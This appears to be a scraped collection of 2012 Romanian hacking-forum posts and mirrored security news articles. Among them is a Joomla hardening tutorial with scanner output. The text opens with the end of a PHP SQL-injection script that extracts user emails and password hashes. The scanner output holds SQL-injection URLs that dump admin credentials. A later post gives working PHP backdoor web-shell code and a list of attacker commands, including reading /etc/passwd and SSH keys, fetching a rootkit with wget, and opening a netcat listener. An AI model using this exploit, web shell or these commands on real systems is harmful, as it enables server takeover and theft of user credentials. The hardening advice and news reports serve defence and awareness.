".$argv[2]."\r\nReturn:\r\n ".$x."\r\n\r\n"; } else { $task = array(array('Amount of registered users', 'SELECT COUNT(`id`) FROM `s_user`', null), array('E- Mail from first user', 'SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1', null), array('Password from first user', 'SELECT `password` FROM `s_user` LIMIT 0,1', null), array('Amount of orders', 'SELECT COUNT(`id`) FROM `s_order`', null) ); for($i = 0; $i < count($task); $i++) { echo "[ .. ] Task: \"".$task[$i][0]."\""; $x = http_req($argv[1], $task[$i][1]); if(!$x = mask($x)) echo "\r[fail] Task: \"".$task[$i][0]."\"\r\n"; else { echo "\r[ ok ] Task: \"".$task[$i][0]."\"\r\n"; $task[$i][2] = $x; } } echo "\r\n"; for($i = 0; $i < count($task); $i++) echo $task[$i][0].space(26-strlen($task[$i][0])).' : '.$task[$i][2]."\r\n"; echo "\r\n"; } ?> # 1337day.com [2012-07-14] http://1337day.com/

Cu totii cred ca stiti cum sa creati un blog folosind un CMS free sau cumparat. Oricum, mentinerea securitatii pe un blog nu este treaba usoara, avand in vedere ca hackerii in general au cunostiinte mult mai vaste decat majoritatea bloggerilor sau detinatoriilor de site-uri. Securitatea unui blog este destul de importanta, deoarece reflecta calitatea afacerii tale. Un hacker iti poate ataca site-ul si apoi informatiile obtinute pot fi folosite in scopuri mai mult sau mai putin bune, lucru ce iti va sifona imaginea. Sunt o gramada de moduri folosite pentru a "sparge" un website, si OWASP (Open Web Application Security Project) a clasificat cele mai periculoase metode si vulnerabilitati. In orice caz, sunt multe metode de a preveni, pe diverse platforme, lucru pe care vreau sa`l prezint in acest topic. Joomla este un CMS open source, usor de instalat si folosit. Cum e si de asteptat, multi bloggeri si detinatori de site-uri folosesc Joomla. Poate ca ai folosit/sau nu Joomla inainte, dar acum cred ca te intrebi cum se poate securiza un website ce foloseste Joomla. In acest topic, voi prezenta scanarea vulnerabilitatilor pentru Joomla, cum sa fixezi vulnerabilitatile, si cum sa implementezi cea mai buna securitate pentru Joomla. Scanarea Vulnerabilitatilor pe Joomla Scanarea de vulnerabilitati, este primul pas ce determina cat de securizata e aplicatia web. Rezultatul, dandu`ti ceva informatii utile despre cum sta treaba in privinta securitatii pe blog-ul sau website-ul tau. Sunt tool-uri facute special pentru scanarea Joomla. Putem folosi un scanner obisnuit, dar vom creste sansele de reusita arunc un ochi si peste rezultatul unui scanner special pentru Joomla. Scannerul de vulnerabilitati Joomla de la OWASP Groosman, asa cum este numit script-ul este scris in perl, folosit pentru a scana un website Joomla, tool-ul fiind de la proiectul de securitate OWASP Joomla. "OWASP Joomla! Vulnerability Scanner v..." are ceva caracteristici interesante: Scaneaza si detecteaza versiunea Joomla Poate descoperii vulnerabilitatile cunoscute pentru Joomla Poate detecta un firewall sau barierele anti-scanning s.a.m.d Tool-ul il puteti gasi pe BackTrack 5 R2 in Applications>BackTrack>Vulnerability Assessment>Web Application Assessment>CMS Vulnerability Identification>joomscan sau root@bt: cd /pentest/web/joomscan Un scurt exemplu de scanare ar fi ceva de genul: Vulnerabilities Discovered ========================== # 1 Info -> Generic: htaccess.txt has not been renamed. Versions Affected: Any Check: /htaccess.txt Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed. Vulnerable? Yes # 2 Info -> Generic: Unprotected Administrator directory Versions Affected: Any Check: /administrator/ Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf Vulnerable? N/A # 3 Info -> Core: Multiple XSS/CSRF Vulnerability Versions Affected: 1.5.9 <= Check: /?1.5.9-x Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities. Vulnerable? N/A # 4 Info -> Core: JSession SSL Session Disclosure Vulnerability Versions effected: Joomla! 1.5.8 <= Check: /?1.5. Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session. Vulnerable? N/A # 5 Info -> Core: Frontend XSS Vulnerability Versions effected: 1.5.10 <= Check: /?1.5.10-x Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin. Vulnerable? N/A # 6 Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability Versions effected: 1.5.11 <= Check: /?1.5.11-x-http_ref Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed. Vulnerable? N/A # 7 Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability Versions effected: 1.5.11 <= Check: /?1.5.11-x-php-s3lf Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser. Vulnerable? N/A # 8 Info -> Core: Authentication Bypass Vulnerability Versions effected: Joomla! 1.5.3 <= Check: /administrator/ Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled Vulnerable? N/A # 9 Info -> Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.3 <= Check: /?1.5.3-path-disclose Exploit: Crafted URL can disclose absolute path Vulnerable? N/A # 10 Info -> Core: User redirected Spamming Vulnerability Versions effected: Joomla! 1.5.3 <= Check: /?1.5.3-spam Exploit: User redirect spam Vulnerable? N/A # 11 Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1.0.13 <= Check: /administrator/ Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage. Vulnerable? N/A # 12 Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability Versions effected: Joomla! 1.5.0 Beta/Stable Check: /libraries/phpmailer/phpmailer.php Exploit: N/A Vulnerable? N/A # 13 Info -> CoreComponent: com_content SQL Injection Vulnerability Version Affected: Joomla! 1.0.0 <= Check: /components/com_content/ Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Vulnerable? No # 14 Info -> CoreComponent: com_search Remote Code Execution Vulnerability Version Affected: Joomla! 1.5.0 beta 2 <= Check: /components/com_search/ Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B Vulnerable? No # 15 Info -> CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/A Check: /components/com_mailto/ Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1 Vulnerable? No # 16 Info -> CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3 Check: /components/com_content/ Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28 Vulnerable? No # 17 Info -> CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.7 <= Check: /components/com_content/ Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration. Vulnerable? N/A # 18 Info -> CoreComponent: com_weblinks XSS Vulnerability Version Affected: Joomla! 1.5.7 <= Check: /components/com_weblinks/ Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms). Vulnerable? N/A # 19 Info -> CoreComponent: com_mailto Email Spam Vulnerability Version Affected: Joomla! 1.5.6 <= Check: /components/com_mailto/ Exploit: The mailto component does not verify validity of the URL prior to sending. Vulnerable? N/A # 20 Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1 Check: /components/com_content/ Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive Vulnerable? No # 21 Info -> CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.9 <= Check: /components/com_content/ Exploit: A XSS vulnerability exists in the category view of com_content. Vulnerable? N/A # 22 Info -> CoreComponent: com_users XSS Vulnerability Version Affected: Joomla! 1.5.10 <= Check: /components/com_users/ Exploit: A XSS vulnerability exists in the user view of com_users in the administrator panel. Vulnerable? N/A # 23 Info -> CoreComponent: com_installer CSRF Vulnerability Versions effected: Joomla! 1.5.0 Beta Check: /administrator/components/com_installer/ Exploit: N/A Vulnerable? N/A # 24 Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability Versions effected: Joomla! 1.5.0 Beta Check: /components/com_search/ Exploit: N/A Vulnerable? No # 25 Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability Versions effected: N/A Check: /components/com_banners/ Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2 Vulnerable? No # 26 Info -> CoreComponent: com_mailto timeout Vulnerability Versions effected: 1.5.13 <= Check: /components/com_mailto/ Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails. Vulnerable? N/A Nu am gasit mare lucru, ma rog, nu mi`am ales bine nici target-ul. Am facut`o pentru a va arata in mare cum arata rezultatul scanarii. La sfarsitul scanarii iti va da "verdictul", There are 1337 vulnerable points in 39 found entries! ~[*] Time Taken: 56 sec ~[*] Send bugs, suggestions, contributions to joomscan@yehg.net CMS Explorer CMS Explorer a fost creat pentru a "explora" un CMS, detectandu-i modulele, pluginurile, si componentele CMS-ului. CMS Explorer poate fi folosit ca unealta pentru scananrea vulnerabilitatilor, deoarece are o optiune pentru a cauta in OSVDB (Open Source Vulnerability Database) pentru a gasi vulnerabilitati cunoscute pentru CMS. El poate scana mai multe CMS-uri, inclusiv Joomla. Tot ce ai nevoie pentru a folosi script-ul CMS Explorer este OSVDB API key. Pentru a face rost de ea: Intra pe website-ul OSVDB si fa`ti un cont. Activeaza`ti contul de pe link-ul care ti`l vor trimite pe mail(sti vrajeala) apoi te conectezi. Du`te la pagina OSVDB API sa faci rost de un API key. Afla directorul unde ai salvat CMS Explorer inainte, apoi creaza un fisier nou. Numeste`l "osvdb.key" Pune-ti API key-ul in osvdb.key si salveaza`l. CMS Explorer este acum gata sa scaneze. Pentru a intra in CMS-Explorer, root@bt: cd /pentest/enumeration/web/cms-explorer Pentru a incepe o scanare simpla, Ma rog, n`am mai asteptat sa scaneze tot, cum am mai zis nu mi`am gasit target-ul azi. In orice caz, obiectivul nostru nu este sa gasim componentele, deci sa ne concentram pe vulnerabilitatile tintei noastre. Pentru a a face asta, avem nevoie de OSVDB key. Nu voi mai scana iar, pentru a face asta: root@bt:/pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://joomlaurl/Joomla -type joomla -osvdb Reusiti sa interpretati si singuri rezultatul. Instalarea in siguranta Primul si cel mai important pas in a crea un website/blog securizat bazat pe Joomla, este sa alegem platforma corecta (web serverul) si sa folosim cele mai bune metode pentru instalare. Daca te tine portofelul, si vrei cu adevarat ceva mai bun pentru securitate, atunci o platforma shared-hosting nu este cea mai buna idee deoarece pe astfel de platforme website-urile impart acelasi server. Asta prezinta un risc. Deci, daca`ti permiti, ia`ti un server dedicat, sau un vps. Cand iti alegi firma de hosting, fi sigur ca ai citit parerile altor utilizatori. Iti vei face o idee despre eficienta companiei. Fi sigur ca firma de hosting foloseste software-uri la zi. Urmatorul pas este sa iei Joomla si sa il instalezi pe server. Unele dintre comapniile de web hosting si forumuri furnizeaza un script care iti permite doar din cateva click-uri sa instalezi faimosul CMS. Asta este cea mai usoara metoda de a instala Joomla. Dar din punct de vedere al securitatii nu este recomandat. Cel mai bine descarci Joomla de pe site-ul oficial(nu de pe alte site-uri , ), apoi il incarci pe web server prin FTP. Creaza o baza de date MySQL pentru instalarea Joomla si fi sigur ca alegi o parola buna pentru baza de date. NU "root,toor,db,password,pass,123,1234,parola". Apoi instalarea este destul de simpla, doar urmeaza procedura. Sa ai grija totusi in urmatoarele privinte: Niciodata nu folosesti numele de utilizator implicit, "admin". Niciodata nu folosesti prefix-ul tabelelor, care este jos_ Nu uita sa stergi directorul de instalare al Joomla, dupa ce acesta a fost instalat cu succes. Intotdeauna protejeaza`ti fisierele si directoarele importante. De exemplu, admin panel-ul joomla si configuration.php ce contin informatii vitale despre baza de date. Foloseste htaccess si ceva extensii bune pentru a spori securitatea. Cum securizam Joomla folosind .htaccess .htaccess este un configuration file al web serverelor ce folosesc Apache. Acesta fiind foarte puternic, putand sa controleze serverul. htaccess este un fisier ascuns care ar trebui sa fie deja prezent in directorul root al serverului tau. Daca nu, il poti crea, dar fi sigur ca numele lui este ".htaccess"(da, incepe cu "punct"). El poate proteja zona administrativa folosind diferite tehnici. De exemplu, poti restrictiona acea zona bazandu`te pe adresa IP. (asta presupune sa creezi un fisier .htaccess in directorul "administrator"): order deny,allow allow from 92.55.65.43 deny from all Nota: Daca ISP-ul tau foloseste IP dynamic, nu este o idee buna sa folosesti aceasta tehnica tinand cont ca IP-ul tau se poate schimba la un momentdat. Pentru a preveni "directory listing". Poti folosi urmatorul cod mai jos in fisierul tau .htaccess prezent in root: IndexIgnore * Options -Indexes O alta metoda buna, este sa dezactivezi semnatura serverului deoarece aceasta da o idee despre software-ul web server-ului si versiunea acestuia. Pentru a face asta, in .htaccess foloseste asta: ServerSignature Off Un alt pas important este sa securizezi fisierul .htaccess pentru ca nimeni sa nu il poate citi in browser. Pentru a face asta, ai nevoie sa adaugi urmatoarele: <Files .htaccess> order allow,deny deny from all </Files> Configuration.php este un fisier foarte important deoarece contine informatii despre baza de date a unui website, si alte informatii relevante. Deci ai nevoie sa securizezi si fisierul configuration.php folosind .htaccess: <FilesMatch "configuration.php"> Order allow,deny Deny from all </FilesMatch> Tinand cont ca sunt destule riscuri asociate cu fisierul configuration.php, nu este suficient ceea ce am facut mai sus. Pentru o securitate maxima, vei avea nevoie sa muti fisierul configuration.php in afara public_html. Cum? Pai, inainte de toate, asta a fost testat pe un Joomla 1.5. Primul pas este sa cream un director home (in afara public_html). Presupunem ca i`am pus numele wubi. Intra in folderul "wubi". Incarca acolo fisierul configuration.php Intra in fisierul Joomla (includes/defines.php) si da`i replace la linia define(‘JPATH_CONFIGURATION’,JPATH_ROOT); cu: define(‘JPATH_CONFIGURATION’,JPATH_ROOT.DS.’../wubi’);. Daca Joomla este subdirector, atunci da`i replace cu: define(‘JPATH_CONFIGURATION’,JPATH_ROOT.DS.’../../’.DS.’wubi’); (ai grija la syntax). Tine minte, wubi este numele folderului creat la pasul 1. Il poti modifica cu ce nume vrei tu. Repeta acest lucru in: administrator/includes/defines.php. Acum site-ul este gata si securizat. Concluzia Chiar daca internetul nu e un loc prea sigur, ai nevoie sa iei in interes personal securitatea website-ului tau. Deci daca vei folosi sau folosesti deja platforma Jooml, fi sigur ca implementezi cele mai bune practici disponibile, daca vrei sa ramai in siguranta. Referinte: InfoSec Resources BackTrack-Linux OWASP OVSDB

Nu conteaza ca ai facut sau nu ceva. Daca prezenta ta e inutila, iar primul tau post se prezinta cam asa, atunci n`ai cum sa nu`i dai dreptate. Prezenta ta e inutila pe forum. Lucru pentru care un moderator sau administrator te poate zbura de aici fara a lasa urme ale existentei tale aici. Accesul la acest forum este un privilegiu, nici decum drept. Nu`i pasa nimanui ca ai luat tu ban pe un cont cu 2 posturi inutile. Nu`ti convine, fa o reclamatie impotriva moderatorului respectiv. Sa fa`ti alt cont, fa niste posturi de calitate si lasa de`o parte mistourile. Aici nu e piata revolutiei sa faci protest sa`ti ceri drepturile. Aici trebuie sa`ti permiti intai sa ai drepturi!

Probabil niciodata. Inca din `98 de cand s`a mentionat prima data de SQL Injection. Deci, se pare ca in 14 ani, nu s`au invatat prea multe lucruri.

Android Forums hacked, User Credentials Stolen Phandroid's Android Forums Web site is hacked and user account details stolen, according to a notice posted online. The data includes the user names, e-mail addresses, hashed passwords, and registration IP addresses of the forums' more than 1 million users. If you are one of them, you should change your password: go to your UserCP or use the Forgot your password?. Furthermore, if you use the same e-mail address and password combination elsewhere, you should change it there as well. "I have some unfortunate news to pass along," the post reads. "Yesterday I was informed by our sever/developer team that the server hosting Androidforums.com was compromised and the website's database was accessed. While the breach is most likely harmless, there are important and potential pitfalls, and we want to provide as much helpful information to our users as possible (without getting too technical)." Phandroid will continue to investigate what happened. The exploit used has been identified and resolved. All code that resides in the database and the file system has been thoroughly reviewed for malicious edits and uploads. Recently, the social Q&A Web site Formspring said that it was the victim of a hack that yielded hashed passwords for around 420,000 of its users. Yahoo warned users of its Yahoo Voice service of a breach in which 400,000 plaintext passwords were stolen from the company and posted online. http://thehackernews.com/2012/07/android-forums-hacked-user-credentials.html

Cross-platform Trojan : Mac, Windows, Linux - Nothing safe ! Security researchers working for F-Secure have found a web exploit that detects the operating system of the computer and drops a different trojan to match.The attack was first seen on a Columbian transport website which had been hacked by a third party. This malware is known as GetShell.A and requires users to approve a Java applet installation. It detects if you're running Windows, Mac OS X, or Linux, and then downloads the corresponding malware for your platform. The malicious files developed for each type of OS connect to the same Command & Control server that F-Secure has localized at IP address 186.87.69.249. Karmina Aquino, a senior analyst with F-Secure said "All three files for the three different platforms behave the same way. They all connect to 186.87.69.249 to get additional code to execute. The ports are 8080, 8081, and 8082 for OSX, Linux and Windows, respectively." On upcoming 29th July 2012 Security Researchers Sina Hatef Matbue and Arash Shirkhorshidi going to Present "Graviton Malware" , which is Cross Platform Malware in 'The Hackers Conference 2012' . The purpose of 'graviton' is to become an artificial creature which can move between world of windows, world of apples, and world of empire penguins, etc. and remain stealth. The Windows one sends the following information back to the remote attacker's CPU details, Disk details, Memory usage, OS version, and user name. The Trojan can also download a file and execute it, or open a shell to receive commands. 'Graviton' is a combination of pure 'C' and 'asm'. The Hackers Conference 2012 is expected to be the first open gathering of Blackhat hackers in India who will debate latest security issues with the top itelligence echolons in India. The conference has sent special invites to Blackhat hackers to come and demonstrate their talent and help the security agencies bridge the knowledge gaps existing today.You can Register yourself here, to attend THC2012. http://thehackernews.com/2012/07/cross-platform-trojan-mac-windows-linux.html

Indian Officials Get Training from Hackers who cracked CERN's IT system Two Argentina-based cyber security experts - Chris Russo and Fernando Viacanel, who claimed to have cracked the security code of IT systems involved in the discovery of 'God Particle', today conducted training sessions for Indian government officials. Both the hackers are partners of IT security firm E2 Labs and their company in arrangement with industry chamber Assocham has plans to conduct series of technology exchange programmes on cyber security. Russo said that three times he has been able to find vulnerability in IT system of European Organisation for Nuclear Research (CERN) that has been involved in discovery of 'God Particle' or Higgs Boson. Programme was attended by officials from Cabinet secretariat, National Technical Research Organisation, Airforce, C-DAC, Income Tax Department, Assam's AMTRON along with representatives from private sector entities, Aircel and Cisco. "Talents required to be cyber security experts are mostly available in people with an average age of below 30. This should be also recognised by government", Senior Director Assocham Ajay Sharma said. Chris Russo also going to Present "Black Arts of Automated and Remote Exploitation" at The Hackers Conference, will be held in New Delhi on July 29 2012. His talk will be about the bundle exploit packs, also known as BEPs. His presentation will shows and demonstrates the mechanisms, including passive and active detection systems, drive by download and drive by cache techniques, geolocation libraries implemented, Obfuscation and encryption techniques, and the selection on the fly of the most convenient exploit for each case. How this systems are used, for malware spreading such as botnets, PPI binaries and Rouge AVs, generating profits for their owners for more than $500 dollars daily. The audience should benefit by understanding the threats, risks and market behind the automated remote exploitation techniques and the entire economic system behind it. His talk will also allow the users to take preventive measures in order to stop these threats or reduce the risk associated with it. The Hackers Conference 2012 is expected to be the first open gathering of Blackhat hackers in India who will debate latest security issues with the top itelligence echolons in India. The conference has sent special invites to Blackhat hackers to come and demonstrate their talent and help the security agencies bridge the knowledge gaps existing today. You can Register yourself here, to attend THC2012. http://thehackernews.com/2012/07/indian-officials-get-training-from.html

Un backdoor shell, e un fisier, ce poate sa fie PHP,ASP,JSP,PLM,PNL,PDL. Ultimele trei sunt mai rar intalnite. Iti voi da un exemplu, poate vei intelege mai bine, mai jos ai un cod care iti va permite ca atacator sa executi comenzi *nix, <?php if(isset($_GET['shell'])) echo("<pre>".shell_exec($_GET['shell']." &")."</pre>"); if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php']))); if(isset($_GET['echo'])) echo($_GET['echo']); ?> Acum vom presupune ca l`am salvat ca HTML.php si l`am incarcat pe un web server Linux. Vom avea nevoie sa punem ?shell= la sfarsit pentru a executa comenzi de genul: cat /etc/passwd wget www.slo.boz.com/rootkit.pl cat /var/www/config.inc find / -name netcat ifconfig | grep eth0 perl botnet.pl nc -lvp 1336 ls -la ps aux | grep root cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat /proc/self/environ find / -perm -1000 -type d 2>/dev/null find / -name perl* find / -name python* find / -name gcc* find / -name cc ruby -v gcc -v perl -v python -v Dar in sec 21, avem shell-uri ce au user interface, ceea ce le face mai usor de utilizat. Ia spre exemplu c99, r57 etc. Multe dintre shell-uri au functii precum email bomber, back-connect, file downloader or uploader, mysql dumper, run sql statements, web fuzzer, port scanner s.a.m.d. Sper ca te`ai lamurit ce si cum sta treaba cu shell-urile backdoor.

Plesk Zero Day Exploit in the Wild, Thousands of sites got Hacked Sucuri Malware Labs notify that some zero-day exploits are available to Hackers which are being used to Hack into Parallels’ Plesk Panel (Port Number 8443). These attacks was keep on raising from last few months as you can see in the Graph: At least 4000 new websites were infected each day, Sucuri malware researcher Daniel Cid. On other News Portals, there was a news recently that Some 50,000 websites have been compromised as part of a sustained iframe injection attack campaign. Security analyst found that, The majority of the sites being targeted are running Plesk Panel version 10.4.4 or older versions. Brian Krebs on his blog report that Hackers in the criminal underground are selling an exploit that extracts the master password needed to control Parallels’ Plesk Panel. This zero-day exploit for Plesk is being sold on the black market for around $8,000 per purchase. Many of the queries probed for web hosting software Plesk, a finding backed by the Sans Internet Storms Centre that noted a sharp uptick in requests over port 8443, used by Plesk. It’s unclear whether this claimed exploit is related to a rash of recent attacks against Plesk installations. Last month, malware researcher Denis Sinegubko had provided analysis of the BlackHole Exploit Kit's successful compromise of several sampled websites, and had determined that a vulnerability in Plesk was probably the culprit. http://thehackernews.com/2012/07/plesk-zero-day-exploit-in-wild.html

4XP Critical SQL Injection Vulnerability Exposed zSecure team has recently discovered a critical SQL Injection Vulnerability in the web portal of 4XP, a leading online forex broker having more than 1 lakh customer base. Financial transactions are carried on the broker's paltform on daily basis including but not limited to Credit Card Transactions. The critical vulnerability allows to get complete access to brokers database which can be misused to access their customers confidential information including their login id's, passwords, home address, email-id's, mobile no's, credit card details etc. This critical vulnerbility could prove devastating to the company if they doesn't fix it asap. Below are the details about the company & discovered vulnerability. About the Company 4XP is an online forex broker that specializes in providing an all-inclusive trading package backed by a caring and devoted support team. 4XP was founded by a group of retail-ended entrepreneurs and capital market dealers sharing a vision for creating a customer-oriented brokerage service that would provide a compelling trading solution. 4XP strives toward creating the most professional and transparent trading environment possible. Vulnerability details Website: www.4xp.com Vulnerability Type: Hidden SQL Injection Vulnerability Database Type: MySql Alert Level: Critical Threats: Complete Database Access, Database Dump, Shell Uploading Worst case scenarios Any malicious smart black hats can create much more devastating attacks using this critical flaw such as: Uninterrupted access to the database Database Dump; Possibility of shell uploading which may result in defacement of website; and Much more . . . Proof of vulnerability http://www.zsecure.net/blog/vulnerabilities/4xp-sql-injection-vulnerability.html http://thehackernews.com/2012/07/4xp-critical-sql-injection.html

NO BOOT FOR YOU ! Will Windows 8 Kill Live CDs and USBs? In January 2012, Microsoft confirmed to PC manufacturers that they must enable Secure Boot by default on PCs to be “Certified for Windows 8”. The purpose of Secure Boot is to put an end to computer viruses that sneak between the hardware and the operating system. These viruses, also known as bootkits, work by getting themselves loaded before the operating system, then they make changes to the operating system while it lies defenseless on disk, and then they load the now defenseless operating system and have their way with it. Secure Boot counters the bootkit by ensuring the hardware verifies the identity and authenticity of the software that sits between the hardware and the operating system - the bootloader, and also the software embedded in hardware devices like network and graphics adapters. Secure Boot sounds like a smart solution to the bootkit problem doesn’t it? Who wouldn’t want a secure boot? Proponents of alternative operating system don’t want Secure Boot; not in its current form anyway. Since Microsoft’s pronouncement, anger has been widespread within Linux communities that Secure Boot on PCs Certified for Windows 8 will lock out alternative operating systems, e.g. all Linux distributions. The problem boils down to the way Microsoft and PC manufacturers will implement Secure Boot, and how difficult it will be for many, if not all, alternative operating systems to follow suit. Microsoft's stance has been "not our problem", and in the everyone for themselves sense, they're right. Will Secure Boot’s implementation also mean that bootable removable media (rescue disks, Live CDs, Live USBs, Live OSs) will also no longer boot? Live CDs and Live USBs provide an “out-of-band” security and management capability that is as relevant to Secure Boot systems as their predecessors. The practice of cleaning an infected device from an independent, external, known clean device is recommended by government cyber security departments (United States Computer Emergency Readiness Team, Canada's Cyber Incident Response Centre, Australian Government's cybersecurity website) and computer security leaders (Krebs, Viega, Rubenking) around the world. A Live OS running several anti-virus scanners is effective at detecting and removing rootkits and bootkits, as well as other types of malware that are not going to be slowed down by Secure Boot. Indeed, with a Live OS, it’s the bootkit that lies defenseless on disk while the Live OS has its way with it. Based on what’s knowable of the Secure Boot implementation on PCs to be Certified for Windows 8 (these don't exist yet for confirming anyone's understanding), external devices containing a Live OS are not going to boot via UEFI’s Secure Boot process. There won’t be a certificate for the Live OS's bootloader in the Secure Boot table of bootloader certificates. Is Secure Boot in exchange for no more Live OS a smart security tradeoff? Enter the Windows 8 Windows Recovery Environment (RE). In a recent “Building Windows 8" blog post, Microsoft program manager Chris Clark details the new capabilities in Windows 8 RE. One of the new capabilities enables the end-user, with the click of the mouse, to tell the Windows bootloader to boot an external device. This feature of Windows RE will make booting a Live OS on an external device easier than it's ever been for end-users. End-users will no longer have to hit a manufacturer specific function key in less than ~2 seconds on startup in order to access and then modify their BIOS\UEFI settings. This is a great development for Live OS on external bootable media, and great news for Linux distributions looking to lower the barrier to entry and capture new users, e.g. Ubuntu's Live OS will now be bootable without requiring the user to fiddle with their computer's BIOS\UEFI, which is at least as difficult as fiddling with the Secure Boot on/off setting will be. The question remaining is - will this new and easy way to boot an external device mean more users than ever will try an alternative operating system on PCs that are otherwise locked to Windows 8? About the Author: Marty Algire is a founder of FixMeStick, makers of the FixMeStick virus removal device that literally anyone can use. He was a founding team member of the pioneering Internet privacy company Zero-Knowledge and Vice-President of Products and Engineering at Radialpoint, a provider of consumer security solutions to the world’s largest ISPs. He has a B.Sc. and M.Sc. in Biosystems Engineering from McGill University. http://thehackernews.com/2012/07/no-boot-for-you-will-windows-8-kill.html

Ce ar trebui sa fie asta mai exact?

Nu merge Filter de la Activity Stream si nu se vad astea, Nici More Activity nu pare sa mearga. Ar fi interesant in loc de vechiul "What`s New?" sa pui Activity Stream, cum e pe vB 4.2. Te acomodezi usor cu el. + ca e mai usor sa iti faci o parere in mare despre tot ce se vorbeste pe forum la momentul respectiv. Alta sugestie, sa pui in navbar chat-ul.

Copilul ala o sa ramana marcat pe viata de TinKode. E versiunea "Wannabe" a lui.

#Sugestie tema GameTime Green de la PureVB Fara sloboazele alea cu Facebook, Twitter, YouTube.